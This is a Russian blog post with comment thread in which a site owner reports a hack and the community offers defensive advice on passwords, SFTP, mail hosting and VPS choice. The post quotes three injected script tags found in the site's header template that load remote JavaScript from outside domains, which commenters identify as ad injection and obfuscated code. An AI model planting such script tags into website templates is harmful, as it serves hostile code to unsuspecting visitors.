февраля 04 2014
0

Взломали сайт и ставили гадости в шаблон

garri83    4 февраля 2014, 18:46    в избранное в избранном    12 комментариев
Блог им. garri83   
Сегодня взломали сайт и вставили гадости в шаблон, а именно в файл header.tpl

<script language='javascript' charset='UTF-8' type='text/javascript' src='http://ulog.tk/top'></script>
<script type="text/javascript" charset="windows-1251" src="http://ulog.tk/top_top"></script>	
<script async charset="UTF-8" type="text/javascript" src="http://pigmont.ru/14ytsv99hv15g3sge8sh198a9rffglmrb68b"></script>


как взломали не знаю.

12 комментариев

0
Меняйте пароль на ftp.
А вообще интересная мысль — скриптом сокращать ссылки. Можно подцепить к внешним ссылкам с использованием goo.gl или byt.ly или др.
0
В первом скрипте присутствует линк на загрузку блоку баннерной рекламы сети popunder.
Чувак, который админит вот это расскажет тебе, каким образом он это сделал.
Второй скрипт какая то обфусцированная хреновина, лень деобфусцировать.
0
Ломают 2 раз уже за 4 дня. Оба раза менял все, 1-й раз даже форматировал комп. 2-ой раз взломали сегодня и взломали mail.ru и через него чуть не увили хостинг с полной заменой контактных данных. Пол дня восстанавливал доступ и данные. Замучился. Подскажите а как можно забанить определенный ip полностью для доступа к сайту? Вроде как-то через .htaccess можно, только не помню как.
+1
Такое совпадение — практически одновременный взлом сайта и почты — это точно какой-то зловред на компе, иначе я не могу это никак объяснить. Посоветовал бы просканировать комп какими-нибудь свежими средствами для поиска руткитов
0
Злоумышленник все тот, что и ломал 1 раз. Он знал на какой email зарегистрирован хостинг и целенаправленно ломал почту и потом пошел менять всю контактную инфу на хостинге. Больше всего поразил хостинг, который я предупредил, что была украдена почта и будет попытка взлома(ломали ночью и я лег спать), а они взяли и выложили злоумышленнику все на тарелочки. Ещё мой IP в бан занесли, одним словом работа на высоком уровне.
Посоветовал бы просканировать комп какими-нибудь свежими средствами для поиска руткитов
А какой можете посоветовать? Нашёл HitmanPro — этот хороший?
+1
1. Меняйте хостинг (лучше взять недорогой VPS около 100р/месяц)
2. Не используйте почту на хостинге (есть яндекс почта для домена, есть google apps и т.д.)
3. Не используйте FTP (пользуйтесь SFTP с авторизацией по ключам)
4. И да, используйте сложные пароли и для любого сайта, почты и так далее пароль длжен быть разный. Для простого и удобного хранения паролей используйте KeePass
0
Не используйте почту на хостинге (есть яндекс почта для домена, есть google apps и т.д.)

Почему можете пояснить? Чем яндекс лучше?
+1
Яндекс, Google Apss, Bing (он тоже дает почту для доменов) лучше по нескольким причинам:

— на shared-хостингах (почти на всех, за очень редким исключением) услуги почтового сервера предоставляются по остаточному принципу, а это значит что и за их безопасностью следят тоже по принципу — работает и ладно.

— Яндекс etc почту защищают хорошо, + защита от спама и фишинга намного более продвинутая, +они все имеют DKIM и через их сервера почта дойдет (при отправке с сервера) гарантированно, что нельзя сказать о почтовом сервере хостинга, так как его IP может уже давно в бане у всех ведущих провайдеров почты по причине спама с их IP на котором может висеть пара сотен сайтов.

— Google Apss имеет двухфакторную авторизацию у Яндекса это тоже в ближайших планах.

Это только основные преимущества, о менее значимых можно написать еще больше.
0
А какую максимальную нагрузку они позволяют через себя пропускать при рассылке на адреса пользователей? Что-то не могу нигде найти…
0
Точно не скажу… у всех по разному. Ограничения чаще всего стоят на количество писем в час.
Вот данные прошлого года:
mail.ru — не более 1 письма в минуту
yandex.ru — не более 500 писем в сутки, не более 25 адресатов в одном письме
gmail.com — не более 2000 писем в сутки и не более 500 получателей в одном письме за раз при отправке через интерфейс gmail.com (через web-интерфейс, т.е. при входе через браузер), не более 100 получателей в одном письме за раз при отправке через ваш почтовый клиент или через шлюз
rambler.ru — не более 200 писем в час

Но учтите, что на shared-хостингах ограничения бывают еще жёстче.
Отредактирован:
0
1. Меняйте хостинг (лучше взять недорогой VPS около 100р/месяц)
C VPS у меня основная сложность — я не умею им управлять. И стоит от дороже за 100р я не встречал.

PS по остальным пунктам все так и делаю.
0
VPS-кой управлять не сложно, не намного сложнее чем сайтом в целом.
По ценам:
Сайт подбора VPS по ценам и характеристикам — poiskvps.ru/
А вот VPS-ка за 99 р/мес. по отзывам вроде не плохо — infobox.ru/vps/linux/
Только зарегистрированные и авторизованные пользователи могут оставлять комментарии.